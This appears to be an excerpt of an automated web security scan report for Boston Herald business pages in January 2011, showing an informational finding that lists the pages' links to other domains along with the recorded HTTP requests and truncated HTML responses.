Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:08:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 89129

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // section_beta.tmpl // --
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<!-- Ad: wallpaper takeover -->


   <link rel="alternate" title="Business - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/business/" type="application/rss+xml">

<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fbusiness%2Findex.bg&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="http://bostonherald.com/business/general/view.bg?articleid=1312531&position=0"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" height="261" width="315" alt="Wal-Mart seeks opening"></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="http://bostonherald.com/business/general/view.bg?articleid=1312531&position=0">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniPoll.gif" alt="Poll"><a href="http://bostonherald.com/business/general/view.bg?articleid=1312531&position=0">
...[SNIP]...
<a href="http://bostonherald.com/business/general/view.bg?articleid=1312519&position=1"><img class="blog_tease" src="http://multimedia.heraldinteractive.com/images/20110127/stp/fabb2e_fin_01282011.jpg" alt="LIVELY DISCUSSION: Panel members, from left, Olivier Blanchard, Robert Gordon and N. Gregory Mankiw talked about fiscal policy at an MIT panel discussion yesterday."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="http://bostonherald.com/business/general/view.bg?articleid=1312647&format=comments&srvc=business&position=2">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="http://bostonherald.com/business/technology/general/view.bg?articleid=1312544&format=comments&srvc=business&position=3">
...[SNIP]...
<a href="http://bostonherald.com/business/general/view.bg?articleid=1312530&srvc=business&position=4"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/86c01a_table_01282011.jpg" alt="SPICING IT UP: Charlie Larner, left, and Michael Winter stand inside the soonto-
be Mija Cantina & Tequila Bar inside a renovated Sam&#x2019;s Cafe at Faneuil Hall
Marketplace.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="http://bostonherald.com/business/general/view.bg?articleid=1312530&format=comments&srvc=business&position=4">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/business/general/view/20110128bank_forecloses_on_mass_supplements_seller_goes/format=comments&srvc=business&position=also">
...[SNIP]...
<a href="/business/media/view/20110128taco_bell_fights_back_on_beef_lawsuit_with_ad_push/srvc=business&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/f8b94c_taco012811.jpg" alt="This a copy of an ad provided by Taco Bell. Taco Bell is launching an advertising campaign Friday, Jan. 28, 2011 to fight back against a lawsuit charging its taco filling isn&rsquo;t beef." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/business/media/view/20110128taco_bell_fights_back_on_beef_lawsuit_with_ad_push/format=comments&srvc=business&position=also">
...[SNIP]...
<a href="/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/srvc=business&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/268649_ford012811.jpg" alt="The Ford logo is seen on the automaker&rsquo;s headquarters in this Oct. 26, 2009 file photo taken in Dearborn, Mich." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=business&position=also">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/business/real_estate/view/20110128robotics_firm_relocating_to_hubs_innovation_district/format=comments&srvc=business&position=also">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/business/healthcare/view/20110128new_balance_gives_7m_for_childhood_obesity_center_at_childrens/format=comments&srvc=business&position=also">
...[SNIP]...
<h3><a href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/StockMover.html?CN=AP707&SITE=MABOH&SECTION=DJSP_COMPLETE">Recent Headlines from AP</a>
...[SNIP]...
</script>
<script language="JavaScript" src="http://hosted.ap.org/lineups/BIZMARKETS_LIST-bulleted.js?SITE=MABOH&SECTION=sports"></script>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/the_ticker/">
           <img class="blogListEntryImage" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/ticker.gif" alt="The Ticker" />
           State hands out $24M in tax breaks to life sciences firms
           </a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/working_stiff/">
           <img class="blogListEntryImage" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/workingStiff.gif" alt="Working Stiff" />
           Five dating tips for first-time job hunters
           </a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/getting_real/">
           <img class="blogListEntryImage" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/getting_real.gif" alt="Getting Real" />
           Fed homebuyer tax credit may actually raise $
           </a>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
<div id="rssBoxWhat"><a href="http://www.feedburner.com/fb/a/feed101" taget="_new">What are RSS feeds?</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business" target="_new">All Business</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/automotive" target="_new">Automotive</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/general" target="_new">Business & Markets</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/healthcare" target="_new">Healthcare</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/media" target="_new">Media & marketing</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/real_estate" target="_new">Real Esate</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/technology" target="_new">Technology</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/technology/reviews" target="_new">Technology Reviews</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/womens" target="_new">Women's Business</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/jobfind/news/your_career" target="_new">Your Career - Jobfind</a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_enews.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_mobil.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_news.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_home.gif">
        </a>
...[SNIP]...
<div style="float: left; background-color:#fff;width:175px; padding:20px 5px; margin:0px; height:260px; overflow:hidden;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=2&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
<span class="bold" /><a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/AZList.html?CN=AP707&SITE=MABOH&SECTION=DJSP_COMPLETE">Quote:</a>
...[SNIP]...
<br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/StockRank.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">Quickrank</a><br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/AZList.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">A-Z List</a><br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/HighLow.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">52 Week High/low</a><br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html?CN=AP707&amp;idx=3&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">Index Performance</a><br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/StockMover.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">Market Movers</a>
...[SNIP]...
<br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/FundRank.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">Quickrank</a><br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/AZList.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">A-Z List</a>
...[SNIP]...
<br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/etfreturns/ETFReturns.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">Quickrank</a>
...[SNIP]...
<td class="t4" align="left" height="15" colspan="5"><a href="http://www.bankrate.com/finance/mortgages/bankrate-com-averages.aspx?pid=p:bhn" class="head-link">Overnight
Averages</a>
...[SNIP]...
<td height="10" width="15" valign="top"><img src="http://www.bankrate.com/brm/images/brm_nd/bullet.gif" width="4" height="4" hspace="1" vspace="4" /></td><td height="10" width="125"><a href="http://www.bankrate.com/funnel/mortgages/?pid=p:bhn&amp;prods=1" class="sidebar-link">30 yr fixed mtg</a>
...[SNIP]...
<td height="10" align="center" width="30"><a href="http://www.bankrate.com/bhn/graphs/graph_trend.asp?product=1&amp;prodtype=M&amp;thisponsor=cf1&amp;ad=mtg&amp;nav=mtg30year_graph&amp;page=default" class="sidebar-link"><img src="http://www.bankrate.com/brm/images/brm_nd/graph.gif" border="0" width="29" height="11" alt="Graph the three month trend" /></a>
...[SNIP]...
<td height="10" align="center"><img src="http://www.bankrate.com/brm/images/artwork/arrow_up_brm.gif" width="11" height="6" vspace="4" /></td></tr><tr><td height="10" width="15" valign="top"><img src="http://www.bankrate.com/brm/images/brm_nd/bullet.gif" width="4" height="4" hspace="1" vspace="4" /></td><td height="10" width="125"><a href="http://www.bankrate.com/funnel/home-equity/?pid=p:bhn&amp;prods=50" class="sidebar-link">$30K HELOC</a></td><td height="10" align="center" width="30"><a href="http://www.bankrate.com/bhn/graphs/graph_trend.asp?product=50&amp;prodtype=L&amp;ad=loan&amp;nav=heloc30k_graph&amp;page=default" class="sidebar-link"><img src="http://www.bankrate.com/brm/images/brm_nd/graph.gif" border="0" width="29" height="11" alt="Graph the three month trend" /></a>
...[SNIP]...
<td height="10" align="center"><img src="http://www.bankrate.com/brm/images/artwork/arrow_ball.gif" width="11" height="1" vspace="4" /></td></tr><tr><td height="10" width="15" valign="top"><img src="http://www.bankrate.com/brm/images/brm_nd/bullet.gif" width="4" height="4" hspace="1" vspace="4" /></td><td height="10" width="125"><a href="http://www.bankrate.com/funnel/auto/?pid=p:bhn&amp;prods=39" class="sidebar-link">48 month new car loan</a>
...[SNIP]...
<td height="10" align="center" width="30"><a href="http://www.bankrate.com/bhn/graphs/graph_trend.asp?product=39&amp;prodtype=A&amp;ad=auto&amp;nav=48mo_newcar_graph&amp;page=default" class="sidebar-link"><img src="http://www.bankrate.com/brm/images/brm_nd/graph.gif" border="0" width="29" height="11" alt="Graph the three month trend" /></a>
...[SNIP]...
<td height="10" align="center"><img src="http://www.bankrate.com/brm/images/artwork/arrow_dn_brm.gif" width="11" height="6" vspace="4" /></td></tr><tr><td height="10" width="15" valign="top"><img src="http://www.bankrate.com/brm/images/brm_nd/bullet.gif" width="4" height="4" hspace="1" vspace="4" /></td><td height="10" width="125"><a href="http://www.bankrate.com/funnel/cd-investments/?pid=p:bhn&amp;prods=15&amp;local=true" class="sidebar-link">1 yr CD</a></td><td height="10" align="center" width="30"><a href="http://www.bankrate.com/bhn/graphs/graph_trend.asp?product=15&amp;prodtype=D&amp;ad=dep&amp;nav=1yearcd_graph&amp;page=default" class="sidebar-link"><img src="http://www.bankrate.com/brm/images/brm_nd/graph.gif" border="0" width="29" height="11" alt="Graph the three month trend" /></a>
...[SNIP]...
<td height="10" align="center"><img src="http://www.bankrate.com/brm/images/artwork/arrow_up_brm.gif" width="11" height="6" vspace="4" /></td>
...[SNIP]...
<!-- // NDN Widget // -->
<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_biz.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

7.4. http://www.bostonherald.com/business/general/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/general/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /business/general/?srvc=home&position=6 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:09:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 60852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>
//-->

   <link rel="alternate" title="Business &amp; Markets - Business - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/business/general/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fbusiness%2Fgeneral%2F%3Fposition%3D0&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/rss">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/users/register/">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/mobile/info.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/about/contact/news_tip.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/about/home_delivery/">
...[SNIP]...
<a href="/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/2204fb_WalMart_12032009.JPG" alt=""></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Comments"><a href="/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/srvc=biz&position=">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniPoll.gif" alt="Comments"><a href="/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/srvc=biz&position=">
...[SNIP]...
<a href="/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/fabb2e_fin_01282011.jpg" alt="LIVELY DISCUSSION: Panel members, from left, Olivier Blanchard, Robert Gordon and N. Gregory Mankiw talked about fiscal policy at an MIT panel discussion yesterday."></a>
...[SNIP]...
<a href="/business/general/view/20110128mexican_lovers_its_fiesta_time_hub_sees_flood_of_eateries_serving_up_south-of-the-border_cuisine/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/86c01a_table_01282011.jpg" alt="SPICING IT UP: Charlie Larner, left, and Michael Winter stand inside the soonto-
be Mija Cantina & Tequila Bar inside a renovated Sam&#x2019;s Cafe at Faneuil Hall
Marketplace.">
</a>
...[SNIP]...
<div style="float: left; background-color:#fff;width:175px; padding:20px 5px; margin:0px; height:260px; overflow:hidden;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=2&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
<span class="bold" /><a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/AZList.html?CN=AP707&SITE=MABOH&SECTION=DJSP_COMPLETE">Quote:</a>
...[SNIP]...
<br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/StockRank.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">Quickrank</a><br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/AZList.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">A-Z List</a><br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/HighLow.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">52 Week High/low</a><br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html?CN=AP707&amp;idx=3&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">Index Performance</a><br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/StockMover.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">Market Movers</a>
...[SNIP]...
<br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/FundRank.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">Quickrank</a><br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/AZList.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">A-Z List</a>
...[SNIP]...
<br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/etfreturns/ETFReturns.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">Quickrank</a>
...[SNIP]...
<td class="t4" align="left" height="15" colspan="5"><a href="http://www.bankrate.com/finance/mortgages/bankrate-com-averages.aspx?pid=p:bhn" class="head-link">Overnight
Averages</a>
...[SNIP]...
<td height="10" width="15" valign="top"><img src="http://www.bankrate.com/brm/images/brm_nd/bullet.gif" width="4" height="4" hspace="1" vspace="4" /></td><td height="10" width="125"><a href="http://www.bankrate.com/funnel/mortgages/?pid=p:bhn&amp;prods=1" class="sidebar-link">30 yr fixed mtg</a>
...[SNIP]...
<td height="10" align="center" width="30"><a href="http://www.bankrate.com/bhn/graphs/graph_trend.asp?product=1&amp;prodtype=M&amp;thisponsor=cf1&amp;ad=mtg&amp;nav=mtg30year_graph&amp;page=default" class="sidebar-link"><img src="http://www.bankrate.com/brm/images/brm_nd/graph.gif" border="0" width="29" height="11" alt="Graph the three month trend" /></a>
...[SNIP]...
